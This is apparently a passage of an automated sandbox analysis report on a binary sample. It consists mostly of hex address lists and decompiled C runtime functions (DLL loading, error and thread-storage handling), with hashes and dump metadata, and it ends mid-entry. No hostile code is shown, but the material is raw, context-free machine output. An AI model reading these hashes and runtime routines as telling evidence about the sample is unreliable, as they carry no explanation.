    0x001ae712
    0x001ae712
    0x001ae714
    0x001ae718
    0x001ae71a
    0x001ae71a
    0x001ae71d
    0x001ae71d
    0x001ae724
    0x001ae726
    0x001ae734
    0x001ae734
    0x001ae736
    0x001ae73a
    0x001ae73c
    0x001ae73c
    0x001ae73f
    0x001ae73f
    0x001ae746
    0x001ae748
    0x001ae756
    0x001ae756
    0x001ae758
    0x001ae75c
    0x001ae75e
    0x001ae75e
    0x001ae761
    0x001ae761
    0x001ae768
    0x001ae76a
    0x00000000
    0x00000000
    0x001ae76a
    0x001ae748
    0x001ae726
    0x001ae704
    0x00000000
    0x00000000
    0x001aeac9
    0x001aeac9
    0x001aeacc
    0x001aeacf
    0x00000000
    0x001aead5
    0x001aead5
    0x001aead8
    0x001aeadc
    0x001aeadc
    0x001aeade
    0x001aeae0
    0x001aeae2
    0x001aeae4
    0x001aeae4
    0x001aeae4
    0x001aeae7
    0x001aeae7
    0x001aeaee
    0x001aeaf0
    0x00000000
    0x001aeaf6
    0x001aeaf6
    0x001aeafa
    0x001aeafe
    0x001aeafe
    0x001aeb00
    0x001aeb02
    0x001aeb04
    0x001aeb06
    0x001aeb06
    0x001aeb06
    0x001aeb09
    0x001aeb09
    0x001aeb10
    0x001aeb12
    0x00000000
    0x001aeb18
    0x001aeb18
    0x001aeb1c
    0x001aeb20
    0x001aeb20
    0x001aeb22
    0x001aeb24
    0x001aeb26
    0x001aeb28
    0x001aeb28
    0x001aeb28
    0x001aeb2b
    0x001aeb2b
    0x001aeb32
    0x001aeb34
    0x00000000
    0x001aeb3a
    0x001aeb3a
    0x001aeb3e
    0x001aeb42
    0x001aeb42
    0x001aeb44
    0x001aeb46
    0x001aeb48
    0x001aeb4a
    0x001aeb4a
    0x001aeb4a
    0x001aeb4d
    0x001aeb4d
    0x001aeb54
    0x001aeb56
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001aeb56
    0x001aeb34
    0x001aeb12
    0x001aeaf0
    0x00000000
    0x00000000
    0x001aeef2
    0x001aeef2
    0x001aeef5
    0x001aeef8
    0x00000000
    0x001aeefe
    0x001aeefe
    0x001aef01
    0x001aef05
    0x001aef05
    0x001aef07
    0x001aef09
    0x001aef0b
    0x001aef0d
    0x001aef0d
    0x001aef0d
    0x001aef10
    0x001aef10
    0x001aef17
    0x001aef19
    0x00000000
    0x001aef1f
    0x001aef1f
    0x001aef23
    0x001aef27
    0x001aef27
    0x001aef29
    0x001aef2b
    0x001aef2d
    0x001aef2f
    0x001aef2f
    0x001aef2f
    0x001aef32
    0x001aef32
    0x001aef39
    0x001aef3b
    0x00000000
    0x001aef41
    0x001aef41
    0x001aef45
    0x001aef49
    0x001aef49
    0x001aef4b
    0x001aef4d
    0x001aef4f
    0x001aef51
    0x001aef51
    0x001aef51
    0x001aef54
    0x001aef54
    0x001aef5b
    0x001aef5d
    0x00000000
    0x001aef63
    0x001aef63
    0x001aef67
    0x001aef6b
    0x001aef6b
    0x001aef6d
    0x001aef6f
    0x001aef71
    0x001aef73
    0x001aef73
    0x001aef73
    0x001aef76
    0x001aef76
    0x001aef7d
    0x001aef7f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001aef7f
    0x001aef5d
    0x001aef3b
    0x001aef19
    0x00000000
    0x00000000
    0x001af30b
    0x001af30b
    0x001af30e
    0x001af311
    0x00000000
    0x001af317
    0x001af317
    0x001af31b
    0x001af31f
    0x001af31f
    0x001af321
    0x001af323
    0x001af325
    0x001af327
    0x001af327
    0x001af327
    0x001af32a
    0x001af32a
    0x001af331
    0x001af333
    0x00000000
    0x001af339
    0x001af339
    0x001af33d
    0x001af341
    0x001af341
    0x001af343
    0x001af345
    0x001af347
    0x001af349
    0x001af349
    0x001af349
    0x001af34c
    0x001af34c
    0x001af353
    0x001af355
    0x00000000
    0x001af35b
    0x001af35b
    0x001af35f
    0x001af363
    0x001af363
    0x001af365
    0x001af367
    0x001af369
    0x001af36b
    0x001af36b
    0x001af36b
    0x001af36e
    0x001af36e
    0x001af375
    0x001af377
    0x00000000
    0x001af37d
    0x001af37d
    0x001af381
    0x001af385
    0x001af385
    0x001af387
    0x001af389
    0x001af38b
    0x001af38d
    0x001af38d
    0x001af38d
    0x001af390
    0x001af390
    0x001af397
    0x001af399
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001af399
    0x001af377
    0x001af355
    0x001af333
    0x00000000
    0x00000000
    0x001ae64a
    0x001ae64a
    0x001ae64d
    0x001ae650
    0x00000000
    0x001ae656
    0x001ae65d
    0x001ae65d
    0x001ae65f
    0x001ae663
    0x001ae665
    0x001ae665
    0x001ae668
    0x001ae668
    0x001ae66f
    0x001ae671
    0x001ae67f
    0x001ae67f
    0x001ae681
    0x001ae685
    0x001ae687
    0x001ae687
    0x001ae68a
    0x001ae68a
    0x001ae691
    0x001ae693
    0x001ae6a1
    0x001ae6a1
    0x001ae6a3
    0x001ae6a7
    0x001ae6a9
    0x001ae6a9
    0x001ae6ac
    0x001ae6ac
    0x001ae6b3
    0x001ae6b5
    0x001ae6c3
    0x001ae6c3
    0x001ae6c5
    0x001ae6c9
    0x001ae6cb
    0x001ae6cb
    0x001ae6ce
    0x001ae6ce
    0x001ae6d5
    0x001ae6d7
    0x00000000
    0x00000000
    0x001ae6d7
    0x001ae6b5
    0x001ae693
    0x001ae671
    0x00000000
    0x00000000
    0x001aea36
    0x001aea36
    0x001aea39
    0x001aea3c
    0x00000000
    0x001aea42
    0x001aea42
    0x001aea45
    0x001aea49
    0x001aea49
    0x001aea4b
    0x001aea4d
    0x001aea4f
    0x001aea51
    0x001aea51
    0x001aea51
    0x001aea54
    0x001aea54
    0x001aea5b
    0x001aea5d
    0x00000000
    0x001aea63
    0x001aea63
    0x001aea67
    0x001aea6b
    0x001aea6b
    0x001aea6d
    0x001aea6f
    0x001aea71
    0x001aea73
    0x001aea73
    0x001aea73
    0x001aea76
    0x001aea76
    0x001aea7d
    0x001aea7f
    0x00000000
    0x001aea85
    0x001aea85
    0x001aea89
    0x001aea8d
    0x001aea8d
    0x001aea8f
    0x001aea91
    0x001aea93
    0x001aea95
    0x001aea95
    0x001aea95
    0x001aea98
    0x001aea98
    0x001aea9f
    0x001aeaa1
    0x00000000
    0x001aeaa7
    0x001aeaa7
    0x001aeaab
    0x001aeaaf
    0x001aeaaf
    0x001aeab1
    0x001aeab3
    0x001aeab5
    0x001aeab7
    0x001aeab7
    0x001aeab7
    0x001aeaba
    0x001aeaba
    0x001aeac1
    0x001aeac3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001aeac3
    0x001aeaa1
    0x001aea7f
    0x001aea5d
    0x00000000
    0x00000000
    0x001aee5f
    0x001aee5f
    0x001aee62
    0x001aee65
    0x00000000
    0x001aee6b
    0x001aee6b
    0x001aee6e
    0x001aee72
    0x001aee72
    0x001aee74
    0x001aee76
    0x001aee78
    0x001aee7a
    0x001aee7a
    0x001aee7a
    0x001aee7d
    0x001aee7d
    0x001aee84
    0x001aee86
    0x00000000
    0x001aee8c
    0x001aee8c
    0x001aee90
    0x001aee94
    0x001aee94
    0x001aee96
    0x001aee98
    0x001aee9a
    0x001aee9c
    0x001aee9c
    0x001aee9c
    0x001aee9f
    0x001aee9f
    0x001aeea6
    0x001aeea8
    0x00000000
    0x001aeeae
    0x001aeeae
    0x001aeeb2
    0x001aeeb6
    0x001aeeb6
    0x001aeeb8
    0x001aeeba
    0x001aeebc
    0x001aeebe
    0x001aeebe
    0x001aeebe
    0x001aeec1
    0x001aeec1
    0x001aeec8
    0x001aeeca
    0x00000000
    0x001aeed0
    0x001aeed0
    0x001aeed4
    0x001aeed8
    0x001aeed8
    0x001aeeda
    0x001aeedc
    0x001aeede
    0x001aeee0
    0x001aeee0
    0x001aeee0
    0x001aeee3
    0x001aeee3
    0x001aeeea
    0x001aeeec
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001aeeec
    0x001aeeca
    0x001aeea8
    0x001aee86
    0x00000000
    0x00000000
    0x001af278
    0x001af278
    0x001af27b
    0x001af27e
    0x00000000
    0x001af284
    0x001af284
    0x001af287
    0x001af28b
    0x001af28b
    0x001af28d
    0x001af28f
    0x001af291
    0x001af293
    0x001af293
    0x001af293
    0x001af296
    0x001af296
    0x001af29d
    0x001af29f
    0x00000000
    0x001af2a5
    0x001af2a5
    0x001af2a9
    0x001af2ad
    0x001af2ad
    0x001af2af
    0x001af2b1
    0x001af2b3
    0x001af2b5
    0x001af2b5
    0x001af2b5
    0x001af2b8
    0x001af2b8
    0x001af2bf
    0x001af2c1
    0x00000000
    0x001af2c7
    0x001af2c7
    0x001af2cb
    0x001af2cf
    0x001af2cf
    0x001af2d1
    0x001af2d3
    0x001af2d5
    0x001af2d7
    0x001af2d7
    0x001af2d7
    0x001af2da
    0x001af2da
    0x001af2e1
    0x001af2e3
    0x00000000
    0x001af2e9
    0x001af2e9
    0x001af2ed
    0x001af2f1
    0x001af2f1
    0x001af2f3
    0x001af2f5
    0x001af2f7
    0x001af2f9
    0x001af2f9
    0x001af2f9
    0x001af2fc
    0x001af2fc
    0x001af303
    0x001af305
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001af305
    0x001af2e3
    0x001af2c1
    0x001af29f
    0x00000000
    0x00000000
    0x001ae5b7
    0x001ae5b7
    0x001ae5ba
    0x001ae5bd
    0x00000000
    0x001ae5c3
    0x001ae5ca
    0x001ae5ca
    0x001ae5cc
    0x001ae5d0
    0x001ae5d2
    0x001ae5d2
    0x001ae5d5
    0x001ae5d5
    0x001ae5dc
    0x001ae5de
    0x001ae5ec
    0x001ae5ec
    0x001ae5ee
    0x001ae5f2
    0x001ae5f4
    0x001ae5f4
    0x001ae5f7
    0x001ae5f7
    0x001ae5fe
    0x001ae600
    0x001ae60e
    0x001ae60e
    0x001ae610
    0x001ae614
    0x001ae616
    0x001ae616
    0x001ae619
    0x001ae619
    0x001ae620
    0x001ae622
    0x001ae630
    0x001ae630
    0x001ae632
    0x001ae636
    0x001ae638
    0x001ae638
    0x001ae63b
    0x001ae63b
    0x001ae642
    0x001ae644
    0x00000000
    0x00000000
    0x001ae644
    0x001ae622
    0x001ae600
    0x001ae5de
    0x00000000
    0x00000000
    0x001ae9a2
    0x001ae9a2
    0x001ae9a5
    0x001ae9a8
    0x00000000
    0x001ae9ae
    0x001ae9ae
    0x001ae9b2
    0x001ae9b6
    0x001ae9b6
    0x001ae9b8
    0x001ae9ba
    0x001ae9bc
    0x001ae9be
    0x001ae9be
    0x001ae9be
    0x001ae9c1
    0x001ae9c1
    0x001ae9c8
    0x001ae9ca
    0x00000000
    0x001ae9d0
    0x001ae9d0
    0x001ae9d4
    0x001ae9d8
    0x001ae9d8
    0x001ae9da
    0x001ae9dc
    0x001ae9de
    0x001ae9e0
    0x001ae9e0
    0x001ae9e0
    0x001ae9e3
    0x001ae9e3
    0x001ae9ea
    0x001ae9ec
    0x00000000
    0x001ae9f2
    0x001ae9f2
    0x001ae9f6
    0x001ae9fa
    0x001ae9fa
    0x001ae9fc
    0x001ae9fe
    0x001aea00
    0x001aea02
    0x001aea02
    0x001aea02
    0x001aea05
    0x001aea05
    0x001aea0c
    0x001aea0e
    0x00000000
    0x001aea14
    0x001aea14
    0x001aea18
    0x001aea1c
    0x001aea1c
    0x001aea1e
    0x001aea20
    0x001aea22
    0x001aea24
    0x001aea24
    0x001aea24
    0x001aea27
    0x001aea27
    0x001aea2e
    0x001aea30
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001aea30
    0x001aea0e
    0x001ae9ec
    0x001ae9ca
    0x00000000
    0x00000000
    0x001aedcc
    0x001aedcc
    0x001aedcf
    0x001aedd2
    0x00000000
    0x001aedd8
    0x001aedd8
    0x001aeddb
    0x001aeddf
    0x001aeddf
    0x001aede1
    0x001aede3
    0x001aede5
    0x001aede7
    0x001aede7
    0x001aede7
    0x001aedea
    0x001aedea
    0x001aedf1
    0x001aedf3
    0x00000000
    0x001aedf9
    0x001aedf9
    0x001aedfd
    0x001aee01
    0x001aee01
    0x001aee03
    0x001aee05
    0x001aee07
    0x001aee09
    0x001aee09
    0x001aee09
    0x001aee0c
    0x001aee0c
    0x001aee13
    0x001aee15
    0x00000000
    0x001aee1b
    0x001aee1b
    0x001aee1f
    0x001aee23
    0x001aee23
    0x001aee25
    0x001aee27
    0x001aee29
    0x001aee2b
    0x001aee2b
    0x001aee2b
    0x001aee2e
    0x001aee2e
    0x001aee35
    0x001aee37
    0x00000000
    0x001aee3d
    0x001aee3d
    0x001aee41
    0x001aee45
    0x001aee45
    0x001aee47
    0x001aee49
    0x001aee4b
    0x001aee4d
    0x001aee4d
    0x001aee4d
    0x001aee50
    0x001aee50
    0x001aee57
    0x001aee59
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001aee59
    0x001aee37
    0x001aee15
    0x001aedf3
    0x00000000
    0x00000000
    0x001af1e5
    0x001af1e5
    0x001af1e8
    0x001af1eb
    0x00000000
    0x001af1f1
    0x001af1f1
    0x001af1f4
    0x001af1f8
    0x001af1f8
    0x001af1fa
    0x001af1fc
    0x001af1fe
    0x001af200
    0x001af200
    0x001af200
    0x001af203
    0x001af203
    0x001af20a
    0x001af20c
    0x00000000
    0x001af212
    0x001af212
    0x001af216
    0x001af21a
    0x001af21a
    0x001af21c
    0x001af21e
    0x001af220
    0x001af222
    0x001af222
    0x001af222
    0x001af225
    0x001af225
    0x001af22c
    0x001af22e
    0x00000000
    0x001af234
    0x001af234
    0x001af238
    0x001af23c
    0x001af23c
    0x001af23e
    0x001af240
    0x001af242
    0x001af244
    0x001af244
    0x001af244
    0x001af247
    0x001af247
    0x001af24e
    0x001af250
    0x00000000
    0x001af256
    0x001af256
    0x001af25a
    0x001af25e
    0x001af25e
    0x001af260
    0x001af262
    0x001af264
    0x001af266
    0x001af266
    0x001af266
    0x001af269
    0x001af269
    0x001af270
    0x001af272
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001af272
    0x001af250
    0x001af22e
    0x001af20c
    0x00000000
    0x00000000
    0x001ae524
    0x001ae527
    0x001ae52a
    0x00000000
    0x001ae530
    0x001ae537
    0x001ae537
    0x001ae539
    0x001ae53d
    0x001ae53f
    0x001ae53f
    0x001ae542
    0x001ae542
    0x001ae549
    0x001ae54b
    0x001ae559
    0x001ae559
    0x001ae55b
    0x001ae55f
    0x001ae561
    0x001ae561
    0x001ae564
    0x001ae564
    0x001ae56b
    0x001ae56d
    0x001ae57b
    0x001ae57b
    0x001ae57d
    0x001ae581
    0x001ae583
    0x001ae583
    0x001ae586
    0x001ae586
    0x001ae58d
    0x001ae58f
    0x001ae59d
    0x001ae59d
    0x001ae59f
    0x001ae5a3
    0x001ae5a5
    0x001ae5a5
    0x001ae5a8
    0x001ae5a8
    0x001ae5af
    0x001ae5b1
    0x00000000
    0x00000000
    0x001ae5b1
    0x001ae58f
    0x001ae56d
    0x001ae54b
    0x00000000
    0x00000000
    0x001ae91f
    0x001ae922
    0x001ae925
    0x00000000
    0x001ae927
    0x001ae927
    0x001ae92a
    0x001ae92e
    0x001ae92e
    0x001ae930
    0x001ae932
    0x001ae934
    0x001ae936
    0x001ae936
    0x001ae936
    0x001ae939
    0x001ae939
    0x001ae940
    0x001ae942
    0x00000000
    0x001ae944
    0x001ae944
    0x001ae948
    0x001ae94c
    0x001ae94c
    0x001ae94e
    0x001ae950
    0x001ae952
    0x001ae954
    0x001ae954
    0x001ae954
    0x001ae957
    0x001ae957
    0x001ae95e
    0x001ae960
    0x00000000
    0x001ae962
    0x001ae962
    0x001ae966
    0x001ae96a
    0x001ae96a
    0x001ae96c
    0x001ae96e
    0x001ae970
    0x001ae972
    0x001ae972
    0x001ae972
    0x001ae975
    0x001ae975
    0x001ae97c
    0x001ae97e
    0x00000000
    0x001ae980
    0x001ae980
    0x001ae984
    0x001ae988
    0x001ae988
    0x001ae98a
    0x001ae98c
    0x001ae98e
    0x001ae990
    0x001ae990
    0x001ae990
    0x001ae993
    0x001ae993
    0x001ae99a
    0x001ae99c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001ae99c
    0x001ae97e
    0x001ae960
    0x001ae942
    0x00000000
    0x00000000
    0x001aed39
    0x001aed3c
    0x001aed3f
    0x00000000
    0x001aed45
    0x001aed45
    0x001aed48
    0x001aed4c
    0x001aed4c
    0x001aed4e
    0x001aed50
    0x001aed52
    0x001aed54
    0x001aed54
    0x001aed54
    0x001aed57
    0x001aed57
    0x001aed5e
    0x001aed60
    0x00000000
    0x001aed66
    0x001aed66
    0x001aed6a
    0x001aed6e
    0x001aed6e
    0x001aed70
    0x001aed72
    0x001aed74
    0x001aed76
    0x001aed76
    0x001aed76
    0x001aed79
    0x001aed79
    0x001aed80
    0x001aed82
    0x00000000
    0x001aed88
    0x001aed88
    0x001aed8c
    0x001aed90
    0x001aed90
    0x001aed92
    0x001aed94
    0x001aed96
    0x001aed98
    0x001aed98
    0x001aed98
    0x001aed9b
    0x001aed9b
    0x001aeda2
    0x001aeda4
    0x00000000
    0x001aedaa
    0x001aedaa
    0x001aedae
    0x001aedb2
    0x001aedb2
    0x001aedb4
    0x001aedb6
    0x001aedb8
    0x001aedba
    0x001aedba
    0x001aedba
    0x001aedbd
    0x001aedbd
    0x001aedc4
    0x001aedc6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001aedc6
    0x001aeda4
    0x001aed82
    0x001aed60
    0x00000000
    0x00000000
    0x001af152
    0x001af155
    0x001af158
    0x00000000
    0x001af15e
    0x001af15e
    0x001af161
    0x001af165
    0x001af165
    0x001af167
    0x001af169
    0x001af16b
    0x001af16d
    0x001af16d
    0x001af16d
    0x001af170
    0x001af170
    0x001af177
    0x001af179
    0x00000000
    0x001af17f
    0x001af17f
    0x001af183
    0x001af187
    0x001af187
    0x001af189
    0x001af18b
    0x001af18d
    0x001af18f
    0x001af18f
    0x001af18f
    0x001af192
    0x001af192
    0x001af199
    0x001af19b
    0x00000000
    0x001af1a1
    0x001af1a1
    0x001af1a5
    0x001af1a9
    0x001af1a9
    0x001af1ab
    0x001af1ad
    0x001af1af
    0x001af1b1
    0x001af1b1
    0x001af1b1
    0x001af1b4
    0x001af1b4
    0x001af1bb
    0x001af1bd
    0x00000000
    0x001af1c3
    0x001af1c3
    0x001af1c7
    0x001af1cb
    0x001af1cb
    0x001af1cd
    0x001af1cf
    0x001af1d1
    0x001af1d3
    0x001af1d3
    0x001af1d3
    0x001af1d6
    0x001af1d6
    0x001af1dd
    0x001af1df
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001af1df
    0x001af1bd
    0x001af19b
    0x001af179
    0x00000000
    0x00000000
    0x001ae51d
    0x001ae05f
    0x001ae056
    0x001ae04d
    0x001ae044
    0x001af625
    0x001af628
    0x001adf62
    0x00000000
    0x001adf62
    0x001adf60
    0x001adf5e
    0x00000000
    0x001adf67
    0x001adf67
    0x001adf69
    0x001adf70
    0x00000000
    0x001adf72
    0x00000000
    0x001adf70
    0x001adf35
    0x00000000

    APIs
    • _ValidateLocalCookies.LIBCMT ref: 001ADF07
    • ___except_validate_context_record.LIBVCRUNTIME ref: 001ADF0F
    • _ValidateLocalCookies.LIBCMT ref: 001ADF98
    • __IsNonwritableInCurrentImage.LIBCMT ref: 001ADFC3
    • _ValidateLocalCookies.LIBCMT ref: 001AE018
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: c7bc9acffe836963e35631257b9b169942f0912c3e47af881cb4e99e8afe39d2
    • Instruction ID: 0144d7c43334b5d782f1b5faa7e736990bdcd372f51b1f0ab13f3d3a516d71f5
    • Opcode Fuzzy Hash: c7bc9acffe836963e35631257b9b169942f0912c3e47af881cb4e99e8afe39d2
    • Instruction Fuzzy Hash: 5B41A438A006089FCF10EF68D880ADFBBB5EF56324F148155F8169B792D731EA56CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: CaretFocus$HideInvertRectReleaseShow
    • String ID:
    • API String ID: 4235554027-0
    • Opcode ID: ae35032a6375f4da39ab2e218cd2bb165156e90ac4b213b2404ed356013fdd37
    • Instruction ID: 264a4b0ef9b40f5a4a34b09c1bbfb516d89276e331a0235c82242f8823bc3c4e
    • Opcode Fuzzy Hash: ae35032a6375f4da39ab2e218cd2bb165156e90ac4b213b2404ed356013fdd37
    • Instruction Fuzzy Hash: A9319778A04209EFCB04DFA8D589AAD7BF0BF09355F118469E889DB351D734EAC4CB41
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E001B2369(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				signed int _v8;
    				void* _t20;
    				void* _t22;
    				WCHAR* _t26;
    				signed int _t29;
    				void** _t30;
    				signed int* _t35;
    				void* _t38;
    				void* _t40;
    
    				_t35 = _a4;
    				while(_t35 != _a8) {
    					_t29 =  *_t35;
    					_v8 = _t29;
    					_t38 =  *(0x1c60b0 + _t29 * 4);
    					if(_t38 == 0) {
    						_t26 =  *(0x1bcae0 + _t29 * 4);
    						_t38 = LoadLibraryExW(_t26, 0, 0x800);
    						if(_t38 != 0) {
    							L14:
    							_t30 = 0x1c60b0 + _v8 * 4;
    							 *_t30 = _t38;
    							if( *_t30 != 0) {
    								FreeLibrary(_t38);
    							}
    							L16:
    							_t20 = _t38;
    							L13:
    							return _t20;
    						}
    						_t22 = GetLastError();
    						if(_t22 != 0x57) {
    							L9:
    							 *(0x1c60b0 + _v8 * 4) = _t22 | 0xffffffff;
    							L10:
    							_t35 =  &(_t35[1]);
    							continue;
    						}
    						_t22 = E001B4A59(_t26, L"api-ms-", 7);
    						_t40 = _t40 + 0xc;
    						if(_t22 == 0) {
    							goto L9;
    						}
    						_t22 = E001B4A59(_t26, L"ext-ms-", 7);
    						_t40 = _t40 + 0xc;
    						if(_t22 == 0) {
    							goto L9;
    						}
    						_t22 = LoadLibraryExW(_t26, _t38, _t38);
    						_t38 = _t22;
    						if(_t38 != 0) {
    							goto L14;
    						}
    						goto L9;
    					}
    					if(_t38 != 0xffffffff) {
    						goto L16;
    					}
    					goto L10;
    				}
    				_t20 = 0;
    				goto L13;
    			}












    0x001b2372
    0x001b2407
    0x001b237a
    0x001b237c
    0x001b2386
    0x001b238b
    0x001b2398
    0x001b23ad
    0x001b23b1
    0x001b2417
    0x001b241c
    0x001b2423
    0x001b2427
    0x001b242a
    0x001b242a
    0x001b2430
    0x001b2430
    0x001b2412
    0x001b2416
    0x001b2416
    0x001b23b3
    0x001b23bc
    0x001b23f5
    0x001b2402
    0x001b2404
    0x001b2404
    0x00000000
    0x001b2404
    0x001b23c6
    0x001b23cb
    0x001b23d0
    0x00000000
    0x00000000
    0x001b23da
    0x001b23df
    0x001b23e4
    0x00000000
    0x00000000
    0x001b23e9
    0x001b23ef
    0x001b23f3
    0x00000000
    0x00000000
    0x00000000
    0x001b23f3
    0x001b2390
    0x00000000
    0x00000000
    0x00000000
    0x001b2396
    0x001b2410
    0x00000000

    APIs
    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,33DA424A,?,001B2476,?,001B0F65,00000000,00000000), ref: 001B242A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: FreeLibrary
    • String ID: api-ms-$ext-ms-
    • API String ID: 3664257935-537541572
    • Opcode ID: a26994648e50d9981f82366ff06e8da5822bdd790bfac6009923227f292f209f
    • Instruction ID: 10ad7a3883c3b51f7e5908a30d6234349cbceac3aa1af2f00a5240302b59cf5d
    • Opcode Fuzzy Hash: a26994648e50d9981f82366ff06e8da5822bdd790bfac6009923227f292f209f
    • Instruction Fuzzy Hash: AC210A31A40211A7CB219BA1EC44FDA3B68EB56770F254225FD13A7AA1EB74ED04C6E0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E001B1C7C(void* __ecx) {
    				void* _t8;
    				void* _t11;
    				void* _t13;
    				void* _t14;
    				void* _t18;
    				void* _t23;
    				long _t24;
    				void* _t27;
    
    				_t13 = __ecx;
    				if( *0x1c4064 != 0xffffffff) {
    					_t24 = GetLastError();
    					_t11 = E001B5FC6(_t13,  *0x1c4064);
    					_t14 = _t23;
    					if(_t11 == 0xffffffff) {
    						L5:
    						_t11 = 0;
    					} else {
    						if(_t11 == 0) {
    							if(E001B6001(_t14,  *0x1c4064, 0xffffffff) != 0) {
    								_push(0x28);
    								_t27 = E001B0F42();
    								_t18 = 1;
    								if(_t27 == 0) {
    									L8:
    									_t11 = 0;
    									E001B6001(_t18,  *0x1c4064, 0);
    								} else {
    									_t8 = E001B6001(_t18,  *0x1c4064, _t27);
    									_pop(_t18);
    									if(_t8 != 0) {
    										_t11 = _t27;
    										_t27 = 0;
    									} else {
    										goto L8;
    									}
    								}
    								E001B0F4D(_t27);
    							} else {
    								goto L5;
    							}
    						}
    					}
    					SetLastError(_t24);
    					return _t11;
    				} else {
    					return 0;
    				}
    			}











    0x001b1c7c
    0x001b1c83
    0x001b1c96
    0x001b1c9d
    0x001b1c9f
    0x001b1ca3
    0x001b1cbc
    0x001b1cbc
    0x001b1ca5
    0x001b1ca7
    0x001b1cba
    0x001b1cc1
    0x001b1cca
    0x001b1ccd
    0x001b1cd0
    0x001b1ce4
    0x001b1ce4
    0x001b1ced
    0x001b1cd2
    0x001b1cd9
    0x001b1cdf
    0x001b1ce2
    0x001b1cf6
    0x001b1cf8
    0x00000000
    0x00000000
    0x00000000
    0x001b1ce2
    0x001b1cfb
    0x00000000
    0x00000000
    0x00000000
    0x001b1cba
    0x001b1ca7
    0x001b1d03
    0x001b1d0d
    0x001b1c85
    0x001b1c87
    0x001b1c87

    APIs
    • GetLastError.KERNEL32(?,?,001B1C73,001ADD33,001AD88B), ref: 001B1C8A
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001B1C98
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001B1CB1
    • SetLastError.KERNEL32(00000000,001B1C73,001ADD33,001AD88B), ref: 001B1D03
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: c68a6a288b1152de5adb7c08cd571c133e6c65d52d4b4e262ba31f36247a4dfd
    • Instruction ID: 23fd2b206ce025de51c3ce25e45ff5017cc2b2e0b7271a0f22aa36c22e7fb255
    • Opcode Fuzzy Hash: c68a6a288b1152de5adb7c08cd571c133e6c65d52d4b4e262ba31f36247a4dfd
    • Instruction Fuzzy Hash: BA01D43228D3117FA72527F57CAADEB2F94DB65374772022EFA11804E1EF118C915244
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
